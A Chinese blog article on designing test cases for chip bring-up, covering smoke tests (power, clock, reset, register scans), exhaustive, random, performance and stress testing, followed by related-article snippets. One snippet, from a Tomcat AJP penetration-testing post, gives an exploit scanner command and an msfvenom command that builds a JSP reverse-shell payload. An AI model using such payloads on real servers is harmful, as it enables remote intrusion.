当前位置: 首页 > news >正文

芯片bring-up的测试用例

文章目录

  • 前言
  • 一、测试用例的规划和编写原则
    • 1、冒烟测试
      • 1)电源时钟复位测试
      • 2)寄存器扫描测试
      • 3)单一功能冒烟测试
    • 二、遍历测试
    • 三、随机测试
    • 四、性能测试
    • 五、压力测试
  • 总结


前言

最近做了一些用测试用例点亮芯片的工作,从测试用例的规划和编写,记录几点开发测试用例的心得体会。


一、测试用例的规划和编写原则

在测试用例前期的规划时,应当遵循由简单到复杂这个原则。

这里从简单到复杂,将测试用例分为如下几类:

  1. 冒烟测试
  2. 遍历测试
  3. 随机测试
  4. 性能测试
  5. 压力测试

1、冒烟测试

冒烟测试是目的是初步评估整个芯片的功能是否完好,其要遵循的原则是小而美。

在编写冒烟测试过程中,在覆盖测试的功能的前提下,应当越简单越好,尽量减少模块之间的依赖,减少因为别的模块有问题,而阻塞当前功能的测试。

芯片回来后,需要在最短的时间内完成冒烟测试,因为冒烟测试可以很大程度提升团队的信心,所以对于冒烟测试,我们往往需要做一些预备方案,要假设冒烟测试可能存在哪些问题,如果出现了这些问题,我应该准备哪些预备方案去应对,这样可以提前准备一些应对措施,快速完成冒烟测试。

冒烟测试可以简单分为:(1)电源时钟复位测试;(2)寄存器扫描测试;(3)单一功能冒烟测试。下面我们挨个介绍。

1)电源时钟复位测试

拿到芯片首先要进行电源,时钟以及复位测试,利用示波器或者相关的寄存器,来确认电源供电是否正常,时钟频率是否正确,复位是否释放。

所以,这个过程我们需要提前准备的是,分析清楚芯片的供电、时钟以及复位方案。
关于供电,(1)检查输入电压和静态电流。电源从哪个pad管脚输入,电压应该是多少,静态电流应该是多少,通过静态电流可以初步判断芯片是否有短路的情况。(2)检查内部各个模块的供电情况。梳理清楚哪些模块是电源线直连的,哪些要经过LDO/DCDC做电压切换,切换的寄存器是多少,切换后的电压如何查询。

关于时钟,梳理时钟树,顺着树根到枝叶依次检查。首先,检查树根,时钟是从哪个pad管脚输入,频率应该是多少;其次,检查中间节点,内部有没有pll,是否有分频,是否有时钟门控;最后,检查枝叶上的时钟是否正常。

关于复位,确认是高有效还是低有效复位,梳理复位树。和时钟一样,先检查树根,确认复位是否被释放;其次,检查中间节点,是否有门控;最后,检查枝叶上的复位是否正常。

2)寄存器扫描测试

搞定电源时钟复位后,就可以进行寄存器扫描测试了。

寄存器扫描测试,要将正常和异常寄存器的扫描分开,先测试正常的,再测试异常的。正常寄存器扫描主要是指可读写的寄存器,异常寄存器扫描测试主要包括:reserved,read only,write1clear等。

在编写寄存器扫描测试时,要遵循小而美的原则,不要将所有的寄存器扫描都写到一个task/function中,一个模块在一种场景下,要单独封装到一个task/function,通过层层嵌套和封装的方式,最终实现整个寄存器扫描,中间加上相关的打印信息,这样做的目的是,一方面可以快速定位到是哪个模块的哪个寄存器挂了,另一方面通过屏蔽部分代码,可以快速扫其他寄存器,而不被当前的问题阻塞,扫完后,只需要调用有问题地方的task/function即可复现问题,从而节省时间。

3)单一功能冒烟测试

搞定寄存器扫描后,就可以进行单一功能冒烟测试了。

这里为什么称之为单一功能冒烟测试,原因是这里的功能测试也是,在保证功能覆盖的前提下,越简单越好。例如,芯片里边有个资源例化了128份,在这里只需要测试其中1份就ok了,然后,可以给这128份资源进行分组测试,例如每16个一组,挑选其中8个作为一个测试用例进行测试。

二、遍历测试

冒烟测试完成后,需要对所有的资源进行遍历测试,确保所有的资源都可以正常使用。例如,硬件例化了128个加法器,那么这里需要对这128个加法器的功能进行挨个遍历测试。

在一些重要的配置中,当其中一些配置,与另外一些配置,需要交叉的场景,也要进行遍历。例如,其中一组配置是a、b、c、d,另外一组配置是1、2、3、4,那么需要对其进行排列组合进行遍历,把所有的场景都覆盖到。

三、随机测试

当配置非常多的时候,排列组合的场景非常多,再去进行遍历,会导致测试用例非常多,这个时候,就需要考虑用一些随机的配置去重复跑,尽可能多的去构造出不同的排列组合的场景,必要的时候,可以写一些覆盖率模型,去收集覆盖到的场景,从而指导随机的方向,做到哪些配置覆盖了,哪些没有覆盖,心里有数。

四、性能测试

性能测试需要提前规划好场景,再根据这些规划好的场景去设计测试用例,测试用例最好能做成自动化。

性能测试用例的场景会比较多,在设计测试用例的时候,最好能做成自动化,即敲一个命令,完成所有的测试,这是因为,在进行性能测试的时候,通常需要对参数进行调优,在调优的过程中,同一个性能测试用例可能需要跑很多遍进行对比。

在性能测试用例非常多的情况下,如果每个测试用例还需要进行参数调优,那么这个工作量会非常巨大,再加上测试过程中,每个测试用例的启动都需要时间,每个测试步骤都基本相同,那么性能测试就变成枯燥无味且耗时的体力活,测试过程中,加入越多的人为因素,也非常容易出错。

五、压力测试

在前面的测试都做完后,可以确认芯片的基本功能没什么问题,但这往往是不够,还需要测试芯片的鲁棒性,即面对大压力,高负载的时候,能不能保持稳定,这个时候就需要进行压力测试。

压力测试往往是需要挂在那里一直跑的测试用例,所以要考虑其自动化,确保能循环一直跑。

压力测试首先要明确,这个压力是指什么,通常在真实芯片中,是模拟实际的应用场景,将流量打满,让其一直工作在满负载的情况下。


总结

本文主要总结在点亮芯片的过程中,我们需要做哪些测试用例,以及编写这些测试用例的时候,有哪些注意事项。

相关文章:

芯片bring-up的测试用例

文章目录 前言一、测试用例的规划和编写原则1、冒烟测试1)电源时钟复位测试2)寄存器扫描测试3)单一功能冒烟测试 二、遍历测试三、随机测试四、性能测试五、压力测试 总结 前言 最近做了一些用测试用例点亮芯片的工作,从测试用例…...

vs code编辑区域右键菜单突然变短

今天打开vs code发现鼠标在编辑区域按右键,出来的菜单只显示一小段 显示不全,而之前的样子是 显示很多项,怎么设置回到显示很多项呢?...

如何将TRIZ的“最终理想解”应用到机器人电机控制设计中?

TRIZ理论,作为一套系统的创新方法论,旨在帮助设计师和工程师突破思维惯性,解决复杂的技术难题。其核心思想之一便是“最终理想解”,它如同一盏明灯,指引着我们在技术创新的道路上不断前行。最终理想解追求的是产品或技…...

【记录】基于docker部署小熊派BearPi-Pico H3863开发环境

参考:📝 Ubuntu环境下开发环境搭建 | 小熊派BearPi 过程 在物理机中创建一个工作路径 /home/luo/locke/BearPi/BearPi_Pico_H3863创建docker容器 docker run -it \ --privilegedtrue --cap-addALL \ --name BearPi-Pico_H3863_env \ -v /home/luo/lo…...

Elasticsearch 与 OpenSearch:谁才是搜索霸主

Elasticsearch简介 Elasticsearch 是一个开源的、基于 RESTful 接口的分布式搜索和分析引擎,它利用了 Apache Lucene 的强大功能。 它特别适合处理大规模数据,这使得它成为管理和分析日志及事件数据的理想选择。 Elasticsearch 以其即时性而著称&…...

WEB渗透-TomcatAjp之LFIRCE

LFI https://github.com/Kit4y/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner >python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.0.110 -p 8009 -f pass配合目标文件上传传入服务器 RCE >msfvenom -p java/jsp_shell_reverse_tcp LHOST192.168.0.107 LPORT12138 R >/va…...

嵌入式初学-C语言-二一

数组指针 概念&#xff1a;数组指针是指向数组的指针。 特点&#xff1a; 先有数组&#xff0c;后有指针 它指向的是一个完整的数组。 一维数组指针 数据类型 (*指针变量名)[容量]&#xff1b; 案例&#xff1a; /** * 数组指针&#xff1a;指向数组的指针 */ #include <…...

2376. 统计特殊整数

Powered by:NEFU AB-IN Link 文章目录 2376. 统计特殊整数题意思路代码 2376. 统计特殊整数 题意 如果一个正整数每一个数位都是 互不相同 的&#xff0c;我们称它是 特殊整数 。 给你一个 正 整数 n &#xff0c;请你返回区间 [1, n] 之间特殊整数的数目。 思路 详见灵神…...

Python 绘图进阶之核密度估计图:掌握数据分布的秘密

Python 绘图进阶之核密度估计图&#xff1a;掌握数据分布的秘密 引言 在数据分析中&#xff0c;了解数据的分布情况是至关重要的一步。除了常用的直方图和箱线图&#xff0c;核密度估计图&#xff08;Kernel Density Estimation, KDE&#xff09;提供了一种更为平滑、直观的方…...

设计模式(1)创建型模式和结构型模式

1、目标 本文的主要目标是学习创建型模式和结构型模式&#xff0c;并分别代码实现每种设计模式 2、创建型模式 2.1 单例模式&#xff08;singleton&#xff09; 单例模式是创建一个对象保证只有这个类的唯一实例&#xff0c;单例模式分为饿汉式和懒汉式&#xff0c;饿汉式是…...

RuoYi-Vue新建模块

一、环境准备 附:RuoYi-Vue下载与运行 二、新建模块 在RuoYi-Vue下新建模块ruoyi-test。 三、父pom文件添加子模块 在RuoYi-Vue的pom.xml中,引入子模块。 <dependency><groupId>com.ruoyi</groupId><artifactId>ruoyi-test</artifactId>&…...

Element-UI自学实践

概述 Element-UI 是由饿了么前端团队推出的一款基于 Vue.js 2.0 的桌面端 UI 组件库。它为开发者提供了一套完整、易用、美观的组件解决方案&#xff0c;极大地提升了前端开发的效率和质量。本文为自学实践记录&#xff0c;详细内容见 &#x1f4da; ElementUI官网 1. 基础组…...

ChatGPT如何工作:创作一首诗的过程

疑问 怎样理解 Chat GPT 的工作原理&#xff1f;比如我让他作一首诗&#xff0c;他是如何创作的呢&#xff1f;每一行诗&#xff0c;每一个字都是怎么来的&#xff1f;随机拼凑的还是从哪里借鉴的&#xff1f; 回答 当你让 ChatGPT 创作一首诗时&#xff0c;它并不是简单地随…...

Linux_Shell变量及运算符-05

一、Shell基础 1.1 什么是shell Shell脚本语言是实现Linux/UNIX系统管理及自W动化运维所必备的重要工具&#xff0c; Linux/UNIX系统的底层及基础应用软件的核心大都涉及Shell脚本的内容。Shell是一种编程语言, 它像其它编程语言如: C, Java, Python等一样也有变量/函数/运算…...

OpenCV图像滤波(13)均值迁移滤波函数pyrMeanShiftFiltering()的使用

操作系统&#xff1a;ubuntu22.04 OpenCV版本&#xff1a;OpenCV4.9 IDE:Visual Studio Code 编程语言&#xff1a;C11 算法描述 函数执行均值迁移图像分割的初始步骤。 该函数实现了均值迁移分割的过滤阶段&#xff0c;即输出是经过滤波的“海报化”图像&#xff0c;其中颜色…...

用爬虫技术探索石墨文档:数据自动化处理与个性化应用的创新实践

用爬虫技术探索石墨文档&#xff1a;数据自动化处理与个性化应用的创新实践 在当今这个信息爆炸的时代&#xff0c;文档管理与协作成为了企业运营和个人工作中不可或缺的一部分。石墨文档&#xff0c;作为一款轻量级的云端Office套件&#xff0c;凭借其强大的在线协作、实时同…...

【JavaEE初阶】线程池

目录 &#x1f4d5; 引言 &#x1f333; 概念 &#x1f340;ThreadPoolExecutor 类 &#x1f6a9; int corePoolSize与int maximumPoolSize&#xff1a; &#x1f6a9; long keepAliveTime与TimeUnit nuit&#xff1a; &#x1f6a9; BlockingQueue workQueue&#xff1a…...

zdpgo_cobra_req 新增解析请求体内容

zdpgo_cobra_req 使用Go语言开发的&#xff0c;类似于curl的HTTP客户端请求工具&#xff0c;用于便捷的测试各种HTTP地址 特性 1、帮助文档都是中文的2、支持常见的HTTP请求&#xff0c;比如GET、POST、PUT、DELETE等 下载 git clone https://github.com/zhangdapeng520/z…...

Java聚合快递对接云洋系统快递小程序源码

&#x1f31f;【一键聚合&#xff0c;高效便捷】快递对接云洋系统小程序全攻略&#x1f680; 引言&#xff1a;告别繁琐&#xff0c;拥抱智能快递新时代&#x1f50d; 在这个快节奏的时代&#xff0c;每一分每一秒都弥足珍贵。你是否还在为手动输入多个快递单号、频繁切换不同…...

陕西西安培华学院计算机软件工程毕业设计课题选题参考目录​

陕西西安培华学院计算机软件工程毕业设计课题选题 博主介绍&#xff1a;✌️大厂码农|毕设布道师&#xff0c;阿里云开发社区乘风者计划专家博主&#xff0c;CSDN平台&#xff0c;✌️Java领域优质创作者,博客之星、掘金/华为云/阿里云等平台优质作者、专注于大学生项目实战开发…...

如何用sql在1分钟从1T数据中精准定位查询?Hive离线数仓 Spark分析

最近在一个群里&#xff0c;从群友哪里了解到这样一个业务需求&#xff1a;如何在 hdfs 1 T源数据库中&#xff0c;1分钟内从其中抓取自己想要的数据&#xff1f; 我的理解是 &#xff1a; 在hdfs数据库中为拥有 尽1T数据的表创建索引,并对其进行性能优化&#xff0c;以实现…...

acpi 主板布局需要 efi

今天在折腾 ESXI 的时候&#xff0c;启动虚拟机跳出了 acpi 主板布局需要 efi 然后我就将 ESXI 的启动方式改为了 EFI 但是虚拟机有莫名的启动不了&#xff0c;网上也没有找到办法&#xff0c;最后&#xff0c;我将虚拟机类型有原本的 ubuntu 换成了 debian 最后启动成功&…...

月之暗面对谈 Zilliz:长文本和 RAG 如何选择?

01 长文本与RAG通用对比 准确率&#xff1a;通常情况下长文本优于RAG 长文本&#xff1a;可更加综合的去分析所有相关的内容&#xff0c;提取相关数字&#xff0c;生成图表&#xff0c;效果尚可。RAG&#xff1a;更适合找到一段或者是几段可能相关的段落。如果希望大模型能够…...

高级java每日一道面试题-2024年8月12日-设计模式篇-请列举出在JDK中几个常用的设计模式?

如果有遗漏,评论区告诉我进行补充 面试官: 请列举出在JDK中几个常用的设计模式? 我回答: 在Java Development Kit (JDK) 中&#xff0c;许多设计模式被广泛使用&#xff0c;以帮助实现软件的结构、行为和复用。下面是一些在JDK中常见的设计模式及其简要说明&#xff1a; 工…...

mysql workbench8.0如何导出mysql5.7格式的sql定义

碰到的问题 mac上安装mysql workbech6.0后不能运行&#xff0c;但安装workbench8.0后&#xff0c;导出的数据库sql文件默认是msyql 8.0的语法和格式。比如生成索引的语句后面会有visible关键字&#xff0c;当把mysql8.0的sql文件导入到mysql5.7时就会报错。 如何解决 点击my…...

数据结构(学习)2024.8.6(顺序表)

今天开始学习数据结构的相关知识&#xff0c;大概分为了解数据结构、算法&#xff1b;学习线性表&#xff1a;顺序表、链表、栈、队列的相关知识和树&#xff1a;二叉树、遍历、创建&#xff0c;查询方法、排序方式等。 目录 一、数据结构 数据 逻辑结构 1.线性结构 2.树…...

MyBatis全解

目录 一&#xff0c; MyBatis 概述 1.1-介绍 MyBatis 的历史和发展 1.2-MyBatis 的特点和优势 1.3-MyBatis 与 JDBC 的对比 1.4-MyBatis 与其他 ORM 框架的对比 二&#xff0c; 快速入门 2.1-环境搭建 2.2-第一个 MyBatis 应用程序 2.3-配置文件详解 (mybatis-config.…...

【Redis进阶】Redis集群

目录 Redis集群的诞生 单节点Redis的局限性 1.存储容量限制 2.性能瓶颈 3.单点故障 4.扩展性能差 分布式系统发展的需要 1.海量数据处理 2.高性能要求 3.弹性扩展能力 Redis集群&#xff08;cluster&#xff09; 如图所示案例 Redis集群设计 什么是数据分片&…...

JVM运行时数据区之虚拟机栈

【1】概述 Java虚拟机栈&#xff08;Java Virtual Machine Stack&#xff09;&#xff0c;早期也叫Java栈。每个线程在创建时都会创建一个虚拟机栈&#xff0c;其内部保存一个个的栈帧&#xff08;Stack Frame&#xff09;&#xff0c;对应着一次次的Java方法调用。 栈是运行…...

Python 机器学习求解 PDE 学习项目 基础知识(4)PyTorch 库函数使用详细案例

PyTorch 库函数使用详细案例 前言 在深度学习中&#xff0c;PyTorch 是一个广泛使用的开源机器学习库。它提供了强大的功能&#xff0c;用于构建、训练和评估深度学习模型。本文档将详细介绍如何使用以下 PyTorch 相关库函数&#xff0c;并提供相应的案例示例&#xff1a; to…...